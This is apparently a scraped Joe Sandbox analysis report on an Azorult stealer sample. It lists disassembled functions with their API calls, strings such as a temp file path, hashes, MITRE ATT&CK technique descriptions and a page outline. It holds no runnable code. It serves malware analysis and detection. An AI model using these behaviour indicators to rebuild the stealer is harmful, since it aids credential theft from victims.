Instruction ID: ab4a798e1dfa23648b03a2b2561a2af29de01fabf162149de749457abe37d48b
Opcode Fuzzy Hash: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
Instruction Fuzzy Hash: 37411331910109AEDB01FF92D952ADDBBBDEF48318F50447BF400B3292D77DAE458A58

Function 0040DDB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C), ref: 0040DE38
DeleteFileW.KERNEL32(00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C,00000001,?), ref: 0040DE7A

Strings

LLA, xrefs: 0040DE19, 0040DE26
%TEMP%\curbuf.dat, xrefs: 0040DE1C, 0040DE44, 0040DE67

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: File$AllocCopyDeleteString
String ID: %TEMP%\curbuf.dat$LLA
API String ID: 5292005-3909751444
Opcode ID: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
Instruction ID: d3139e3bb668dcd489f787ebceafddff3eb8ed9e6fe86914fc70b8a9fa006da4
Opcode Fuzzy Hash: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
Instruction Fuzzy Hash: 3E21FC74D10509ABDB00FBE5C88299EB7B9AF54305F50857BF400B72D2D738AE058A99

Function 00417E78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7

Strings

dnsapi.dll, xrefs: 00417EAC
DnsQuery_A, xrefs: 00417EA7

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: DnsQuery_A$dnsapi.dll
API String ID: 2574300362-3847274415
Opcode ID: 724cfed19cb1d21381234b51a37364b79d38ba7da5abfef29c6bd78e431c9a57
Instruction ID: ee02e28701cd333fe80aa916ff0e932040e536dc5bff3800914b034e455f76c5
Opcode Fuzzy Hash: 724cfed19cb1d21381234b51a37364b79d38ba7da5abfef29c6bd78e431c9a57
Instruction Fuzzy Hash: A9115E71A08304AED711DBA9CC52B9EBBB8DB45704F5140A7E504E72D2D6789E018B58

Function 00417E7C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7

Strings

dnsapi.dll, xrefs: 00417EAC
DnsQuery_A, xrefs: 00417EA7

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: DnsQuery_A$dnsapi.dll
API String ID: 2574300362-3847274415
Opcode ID: 50f0b7069414203643d559ff8c1b4067f618f2f1807c4d8d96e87e961dc54617
Instruction ID: 3ed38bd560de987a20526e09c97c4f2d359d7c1ce2b9a36b0a47fbdadc566110
Opcode Fuzzy Hash: 50f0b7069414203643d559ff8c1b4067f618f2f1807c4d8d96e87e961dc54617
Instruction Fuzzy Hash: 48113D71A08304AEDB11DBA9CD52B9EBBB8DB44714F5140BBF904E73D1D6789E018B58

Function 00416644 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,EnumDisplayDevicesW,00000000,0041670D,?,-00000001,0041B0FC,?,?,00416863,Video Info,?,004169AC,?,GetRAM: ,?), ref: 00416678
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0041667E

Strings

user32.dll, xrefs: 00416673
EnumDisplayDevicesW, xrefs: 0041666E

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: EnumDisplayDevicesW$user32.dll
API String ID: 2574300362-1693391355
Opcode ID: be31b090cf9e22f53fe63a2b9ccc94bb75e49f076f039a93db071de62ba29d85
Instruction ID: bffb8a391e8cbf63d1c0eded9315efc20e69fe0ee1e689c0aa8ff6c2638661ea
Opcode Fuzzy Hash: be31b090cf9e22f53fe63a2b9ccc94bb75e49f076f039a93db071de62ba29d85
Instruction Fuzzy Hash: 7E118970500618AFDB61EF61CC45BDABBBCEF84709F1140FAE508A6291D6789E848E58

Function 00417E80 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7

Strings

dnsapi.dll, xrefs: 00417EAC
DnsQuery_A, xrefs: 00417EA7

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: DnsQuery_A$dnsapi.dll
API String ID: 2574300362-3847274415
Opcode ID: a19d4597b475aaa9ac328eaf6b87c7589b0a3e1b2296b7586c6c4fb46158065e
Instruction ID: 92d1eb556667ed81b8552bf9075b82756b3340621e6324b7cba7be93811987cb
Opcode Fuzzy Hash: a19d4597b475aaa9ac328eaf6b87c7589b0a3e1b2296b7586c6c4fb46158065e
Instruction Fuzzy Hash: 20111CB1A04304AED751DBAACD42B9FBBF8EB48714F5140B6F904E73C1E678DE418A58

Function 00401870 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
Instruction ID: 5328ea8a61f1b3c3886908a4d7eb6976bfaff4b38786c7c23389d9dab3a387f7
Opcode Fuzzy Hash: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
Instruction Fuzzy Hash: 06015BB0684390AEE719AB6A9C967957F92D749704F05C0BFE100BA6F1CB7D5480CB1E

Function 0040246C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,^), ref: 004024AF
RtlLeaveCriticalSection.KERNEL32(0041C5B4,00402524), ref: 00402517

Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920

Strings

^, xrefs: 00402496

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID: ^
API String ID: 2227675388-551292248
Opcode ID: 36f5b8f16900d0e995ce4c5524c526641fb23a44d7305ae2e8247758f3247216
Instruction ID: 4ed45a5183fb1a6edd108f9af425bfacc088641811e0c18f6da98f6ec62fa594
Opcode Fuzzy Hash: 36f5b8f16900d0e995ce4c5524c526641fb23a44d7305ae2e8247758f3247216
Instruction Fuzzy Hash: 92113431700210AEEB25AB7A5F49B5A7BD59786358F20407FF404F32D2D6BD9C00825C

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Oggq2dY6kx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Azorult

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
Oggq2dY6kx.exe

Function 00417B1A Relevance: 57.8, APIs: 20, Strings: 13, Instructions: 64
libraryloaderCOMMON

Function 0040561C Relevance: 220.8, APIs: 63, Strings: 63, Instructions: 312
libraryloaderCOMMON

Function 00419108 Relevance: 57.0, APIs: 4, Strings: 28, Instructions: 964
synchronizationCOMMON

Function 00418688 Relevance: 42.4, APIs: 18, Strings: 6, Instructions: 375
libraryloadernetworkCOMMON

Function 0040955E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10
libraryloaderCOMMON

Function 00407C58 Relevance: 4.6, APIs: 3, Instructions: 80
COMMON

Function 004040F4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16
memoryCOMMON

Function 00407B78 Relevance: 3.1, APIs: 2, Instructions: 84
COMMON

Function 00407B77 Relevance: 3.1, APIs: 2, Instructions: 80
COMMON

Function 00407500 Relevance: 3.1, APIs: 2, Instructions: 76
registryCOMMON

Function 004033F4 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Function 004033EC Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Function 004033F0 Relevance: 3.1, APIs: 2, Instructions: 64
COMMON

Function 00406DA8 Relevance: 3.1, APIs: 2, Instructions: 58
registryCOMMON

Function 00406DAC Relevance: 3.1, APIs: 2, Instructions: 58
registryCOMMON